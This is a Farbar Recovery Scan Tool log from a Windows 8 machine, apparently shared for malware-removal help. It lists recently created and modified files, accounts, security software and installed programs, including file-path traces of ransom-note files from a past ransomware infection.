2015-07-16 08:41 - 2015-05-30 15:36 - 00230400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2015-07-16 08:41 - 2015-05-30 15:35 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2015-07-16 08:41 - 2015-03-08 22:02 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthhfenum.sys
2015-07-16 08:41 - 2014-12-19 04:57 - 00788680 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
2015-07-16 08:41 - 2014-12-19 04:25 - 00602776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00535640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00531616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ci.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00448792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00413248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00372408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Faultrep.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00108944 _____ (Microsoft Corporation) C:\WINDOWS\system32\EncDump.dll
2015-07-16 08:41 - 2014-12-08 15:42 - 00038264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WerFaultSecure.exe
2015-07-16 08:41 - 2014-12-08 15:42 - 00033584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WerFaultSecure.exe
2015-07-16 08:41 - 2014-10-30 18:37 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2015-07-16 08:41 - 2014-10-30 18:34 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
2015-07-16 08:40 - 2015-05-02 20:39 - 00227328 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2015-07-16 08:38 - 2015-05-07 11:21 - 00522240 _____ (Microsoft Corporation) C:\WINDOWS\system32\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-05-07 11:05 - 00367104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GeofenceMonitorService.dll
2015-07-16 08:38 - 2015-04-09 20:34 - 02256896 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2015-07-16 08:38 - 2015-04-09 20:11 - 01943040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2015-07-15 16:18 - 2015-02-20 19:49 - 00780800 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2015-07-15 16:16 - 2015-04-24 22:25 - 00020992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usb8023.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00239424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2015-07-15 14:11 - 2015-03-13 00:03 - 00154432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2015-07-15 11:02 - 2015-04-30 16:35 - 00124112 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2015-07-15 11:02 - 2015-04-30 16:35 - 00102608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2015-07-14 08:21 - 2015-07-20 08:35 - 00000000 ___HD C:\7afd7914
2015-07-13 15:36 - 2015-07-13 15:36 - 00002233 _____ C:\Users\Richie\Desktop\HP Support Assistant.lnk
2015-07-13 15:33 - 2015-07-13 15:33 - 00000000 ____D C:\ProgramData\{18165758-115C-4DC0-9EC2-FF89F725767F}
2015-07-10 18:12 - 2015-07-12 01:16 - 00000000 ___DC C:\WINDOWS\Panther
2015-07-10 18:12 - 2015-07-10 18:12 - 00000000 __SHD C:\Recovery
2015-07-10 18:08 - 2015-07-10 18:08 - 00262144 _____ C:\WINDOWS\system32\config\userdiff
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\Program Files (x86)\MSBuild
2015-07-10 18:05 - 2015-07-10 18:05 - 00000000 ____D C:\inetpub
2015-07-10 18:03 - 2013-08-03 00:48 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2015-07-10 18:03 - 2013-08-03 00:41 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2015-07-10 15:59 - 2015-07-20 08:44 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieBrowserModeList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieUserList
2015-07-10 15:59 - 2015-07-20 08:43 - 00000000 __SHD C:\Users\Richie\AppData\Local\EmieSiteList
2015-07-10 15:39 - 2015-07-28 16:08 - 00000000 ___RD C:\Users\Richie\OneDrive
2015-07-10 15:34 - 2015-07-28 13:17 - 00000000 ____D C:\Users\Richie\AppData\Local\{beedd195-7534-c93e-bcaf-0a2671d4725d}
2015-07-10 15:34 - 2015-07-10 15:34 - 00000000 ___HD C:\ProgramData\{F66CB4EE-546F-4D54-9332-216DE189AAB0}
2015-07-10 15:30 - 2015-07-10 15:30 - 00001442 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-07-10 15:28 - 2015-07-10 15:28 - 00000020 ___SH C:\Users\Richie\ntuser.ini
2015-07-10 15:20 - 2015-07-28 16:34 - 01701369 _____ C:\WINDOWS\WindowsUpdate.log
2015-07-10 15:19 - 2015-07-10 15:19 - 00022744 _____ C:\WINDOWS\system32\emptyregdb.dat
2015-07-10 14:53 - 2015-07-10 14:53 - 00001547 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default\Documents\hp.system.package.metadata
2015-07-10 14:53 - 2015-07-10 14:53 - 00000000 ____D C:\Users\Default User\Documents\hp.system.package.metadata
2015-07-10 14:46 - 2015-07-10 14:46 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2015-07-10 14:35 - 2015-07-27 20:13 - 00000000 ____D C:\Users\Richie
2015-07-10 14:35 - 2015-07-10 14:45 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-10 14:35 - 2014-11-21 11:57 - 00000000 ___RD C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2015-07-10 14:35 - 2014-11-21 04:52 - 00000369 _____ C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2015-07-10 14:35 - 2013-08-22 11:36 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagwrn.xml
2015-07-10 14:34 - 2015-07-10 15:20 - 00020958 _____ C:\WINDOWS\diagerr.xml
2015-07-10 14:21 - 2015-07-10 14:45 - 00012096 _____ C:\WINDOWS\iis.log
2015-07-10 14:21 - 2015-07-10 14:21 - 00930400 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
2015-07-10 14:16 - 2015-07-10 14:16 - 00000264 _____ C:\WINDOWS\Tasks\Synaptics TouchPad Enhancements.job
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Realtek
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2015-07-10 14:16 - 2015-07-10 14:16 - 00000000 _____ C:\WINDOWS\ativpsrm.bin
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01009.Wdf
2015-07-10 14:15 - 2015-07-10 14:15 - 00000000 ____D C:\Program Files\Synaptics
2015-07-10 12:07 - 2015-07-10 15:20 - 00006605 _____ C:\WINDOWS\comsetup.log
2015-07-08 08:00 - 2015-07-12 01:09 - 00000000 ____D C:\WINDOWS\system32\AutoUpdateLicense
2015-07-06 09:21 - 2015-03-04 03:26 - 00011105 ____N C:\WINDOWS\system32\AutoconfigV2.cab
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2015-07-28 16:32 - 2012-07-26 03:59 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-07-28 16:16 - 2013-06-06 22:42 - 00003598 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2321640021-2341620851-140482586-1002
2015-07-28 16:13 - 2014-11-21 04:44 - 00956476 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2015-07-28 16:05 - 2013-08-22 10:46 - 00298411 _____ C:\WINDOWS\setupact.log
2015-07-28 16:05 - 2013-08-22 10:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-07-28 16:04 - 2014-11-21 04:34 - 00868726 _____ C:\WINDOWS\PFRO.log
2015-07-28 16:03 - 2013-08-22 09:25 - 00786432 ___SH C:\WINDOWS\system32\config\BBI
2015-07-28 16:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sru
2015-07-28 13:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\vpnplugins
2015-07-28 13:17 - 2014-12-06 22:56 - 00000000 ____D C:\ProgramData\LeboBukmo
2015-07-28 13:17 - 2014-11-26 00:56 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate
2015-07-28 13:17 - 2014-11-21 00:32 - 00000000 ____D C:\ProgramData\IomuTdilf
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\Users\Richie\AppData\Roaming\FrameworkUpdate7
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\XesviPteyu
2015-07-28 13:17 - 2014-11-11 19:24 - 00000000 ____D C:\ProgramData\IojdOnyo
2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\XiboHbik
2015-07-28 13:17 - 2014-11-09 01:59 - 00000000 ____D C:\ProgramData\EoxoKazxa
2015-07-28 13:17 - 2014-11-07 20:16 - 00000000 ____D C:\ProgramData\RogoLatk
2015-07-28 13:17 - 2014-11-07 20:15 - 00000000 ____D C:\ProgramData\BoweCpeb
2015-07-28 13:17 - 2013-06-06 20:08 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Adobe
2015-07-28 12:02 - 2013-09-27 22:11 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-07-28 11:48 - 2013-06-06 20:08 - 00003922 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{3DBD3851-149E-4BFD-A49D-F9E67AA1E10F}
2015-07-28 11:47 - 2014-11-05 01:20 - 00000000 ____D C:\ProgramData\HezagTonag
2015-07-27 20:17 - 2013-08-22 10:44 - 00337808 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-07-27 19:02 - 2013-04-23 03:51 - 00000000 ____D C:\ProgramData\Norton
2015-07-27 18:55 - 2013-08-22 09:25 - 00262144 ___SH C:\WINDOWS\system32\config\ELAM
2015-07-27 18:55 - 2012-07-26 04:12 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2015-07-25 09:24 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2015-07-25 09:18 - 2013-06-06 20:03 - 00000000 ____D C:\Users\Richie\AppData\Local\Packages
2015-07-21 16:58 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\rescache
2015-07-20 08:44 - 2015-01-29 00:30 - 00020480 ___SH C:\Users\Richie\Desktop\Thumbs.db
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools
2015-07-20 08:01 - 2013-08-22 11:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ToastData
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\WinStore
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-RS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\sr-Latn-CS
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Windows Defender
2015-07-20 08:00 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2015-07-20 08:00 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\AdvancedInstallers
2015-07-18 11:03 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2015-07-18 08:25 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\AppCompat
2015-07-17 10:52 - 2014-11-21 04:25 - 00000000 ____D C:\Program Files\Windows Journal
2015-07-17 09:50 - 2013-04-23 02:57 - 00000000 ____D C:\Program Files (x86)\ATI Technologies
2015-07-17 08:53 - 2014-11-21 11:56 - 00000000 ___SD C:\WINDOWS\system32\CompatTel
2015-07-13 17:10 - 2014-11-21 12:03 - 00792568 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2015-07-13 17:10 - 2014-11-21 12:03 - 00178168 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-07-13 15:37 - 2014-07-06 22:58 - 00000350 _____ C:\WINDOWS\Tasks\HPCeeScheduleForRichie.job
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2015-07-13 15:36 - 2012-08-17 14:28 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-07-13 15:34 - 2012-08-17 14:00 - 00000000 ____D C:\Program Files (x86)\Hewlett-Packard
2015-07-13 15:30 - 2012-08-17 14:26 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2015-07-13 15:29 - 2012-08-17 14:28 - 00000000 ____D C:\WINDOWS\System32\Tasks\Hewlett-Packard
2015-07-13 15:25 - 2012-08-03 20:02 - 00000000 ____D C:\SWSetup
2015-07-10 18:09 - 2013-08-22 11:36 - 00262144 _____ C:\WINDOWS\system32\config\BCD-Template
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2015-07-10 18:05 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2015-07-10 18:04 - 2014-11-21 05:16 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00063488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00051200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2015-07-10 18:04 - 2014-11-21 05:16 - 00015872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00012800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2015-07-10 18:04 - 2014-11-21 05:16 - 00009728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2015-07-10 15:20 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Registration
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RSD C:\WINDOWS\Media
2015-07-10 15:15 - 2013-08-22 11:36 - 00000000 __RHD C:\Users\Public\Libraries
2015-07-10 14:54 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2015-07-10 14:54 - 2013-04-23 03:36 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Communication and Chat
2015-07-10 14:54 - 2013-04-23 03:28 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CyberLink LabelPrint
2015-07-10 14:54 - 2013-04-23 03:23 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2015-07-10 14:54 - 2012-08-17 14:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-07-10 14:54 - 2012-08-17 14:13 - 00000000 ____D C:\WINDOWS\en
2015-07-10 14:54 - 2012-08-17 14:12 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live
2015-07-10 14:53 - 2013-08-22 11:37 - 00005217 _____ C:\WINDOWS\DtcInstall.log
2015-07-10 14:53 - 2012-07-26 01:37 - 00000000 ____D C:\Users\Default.migrated
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\WCN
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2015-07-10 14:52 - 2014-11-21 04:00 - 00000000 ____D C:\WINDOWS\system32\WCN
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\migwiz
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\spool
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\MUI
2015-07-10 14:52 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\IME
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\SysWOW64\SMI
2015-07-10 14:52 - 2013-08-22 09:36 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-07-10 14:52 - 2013-04-23 03:06 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2015-07-10 14:52 - 2012-08-17 14:07 - 00000000 ____D C:\WINDOWS\SysWOW64\Adobe
2015-07-10 14:50 - 2013-08-22 11:43 - 00000000 ____D C:\WINDOWS\DigitalLocker
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\Help
2015-07-10 14:50 - 2013-08-22 11:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2015-07-10 14:50 - 2013-06-06 20:07 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Shopping and Services
2015-07-10 14:50 - 2012-08-17 14:05 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection
2015-07-10 14:50 - 2012-08-03 18:29 - 00000000 ____D C:\ProgramData\PRICache
2015-07-10 14:46 - 2013-08-22 11:36 - 00000000 ____D C:\WINDOWS\system32\Recovery
2015-07-10 14:14 - 2013-08-22 09:36 - 00000000 __RHD C:\Users\Default
2015-07-10 13:48 - 2013-06-06 20:03 - 02013866 _____ C:\WINDOWS\WindowsUpdate (1).log
2015-07-10 10:22 - 2012-07-26 04:12 - 00000000 ____D C:\WINDOWS\AUInstallAgent
2015-07-08 07:59 - 2014-12-13 10:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Ecidcuo
2015-07-08 07:59 - 2014-12-06 22:58 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Evcoguyl
2015-07-08 07:59 - 2014-11-21 00:33 - 00000000 ____D C:\Users\Richie\AppData\Roaming\Urablax
2015-07-06 16:41 - 2015-06-21 01:14 - 00000000 ____D C:\Users\Public\Downloads\Norton
2015-07-03 08:43 - 2013-07-17 21:58 - 130333168 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
 
==================== Files in the root of some directories =======
 
2015-07-17 10:59 - 2015-07-17 10:59 - 0266240 _____ () C:\Users\Richie\AppData\Roaming\7afd7914.dll
2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2015-01-29 00:25 - 2015-01-29 00:25 - 0008528 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.HTML
2015-01-29 00:25 - 2015-01-29 00:25 - 0045533 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.PNG
2015-01-29 00:25 - 2015-01-29 00:25 - 0004204 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.TXT
2015-01-29 00:25 - 2015-01-29 00:25 - 0000272 _____ () C:\Users\Richie\AppData\Roaming\HELP_DECRYPT.URL
2014-11-11 19:24 - 2014-11-11 19:24 - 0000448 ____H () C:\Users\Richie\AppData\Roaming\麽鎒駓覜
2014-11-11 19:33 - 2014-11-11 19:33 - 0008516 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-11-11 19:33 - 2014-11-11 19:33 - 0004198 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-11-11 19:33 - 2014-11-11 19:33 - 0000268 _____ () C:\Users\Richie\AppData\Local\DECRYPT_INSTRUCTION.URL
2015-01-29 00:24 - 2015-01-29 00:24 - 0008528 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.HTML
2015-01-29 00:24 - 2015-01-29 00:24 - 0045533 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.PNG
2015-01-29 00:24 - 2015-01-29 00:24 - 0004204 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.TXT
2015-01-29 00:24 - 2015-01-29 00:24 - 0000272 _____ () C:\Users\Richie\AppData\Local\HELP_DECRYPT.URL
2014-11-11 19:24 - 2015-01-28 23:26 - 0000664 _____ () C:\ProgramData\@system.temp
2014-11-11 19:25 - 2015-01-28 23:27 - 0000400 ____H () C:\ProgramData\@system3.att
 
Some files in TEMP:
====================
C:\Users\Richie\AppData\Local\Temp\avgnt.exe
C:\Users\Richie\AppData\Local\Temp\sp64126.exe
C:\Users\Richie\AppData\Local\Temp\UninstallHPSA.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-07-28 16:17
 
==================== End of log ============================
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:26-07-2015
Ran by Richie at 2015-07-28 16:37:53
Running from C:\Users\Richie\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-2321640021-2341620851-140482586-500 - Administrator - Disabled)
Guest (S-1-5-21-2321640021-2341620851-140482586-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-2321640021-2341620851-140482586-1004 - Limited - Enabled)
Richie (S-1-5-21-2321640021-2341620851-140482586-1002 - Administrator - Enabled) => C:\Users\Richie
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avira Antivirus (Enabled - Out of date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Out of date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.5.635 - Adobe Systems, Inc.)
AMD Catalyst Install Manager (HKLM\...\{63ADEC24-A374-80A8-E89B-BE401C787F75}) (Version: 8.0.881.0 - Advanced Micro Devices, Inc.)
AMD VISION Engine Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
Avira (HKLM-x32\...\{8467e01f-0496-42ce-b247-88ef205b4880}) (Version: 1.1.40.29239 - Avira Operations GmbH & Co. KG)
Avira (x32 Version: 1.1.40.29239 - Avira Operations GmbH & Co. KG) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.12.408 - Avira Operations GmbH & Co. KG)
Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Build-a-lot 4 - Power Source (x32 Version: 2.2.0.98 - WildTangent) Hidden
Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden
Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1.5407 - CyberLink Corp.)
CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)
CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1926 - CyberLink Corp.)
CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)
Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden
FATE: The Cursed King (x32 Version: 2.2.0.97 - WildTangent) Hidden
Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden
FlatOut 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 44.0.2403.107 - Google Inc.)
Google Update Helper (x32 Version: 1.3.28.1 - Google Inc.) Hidden
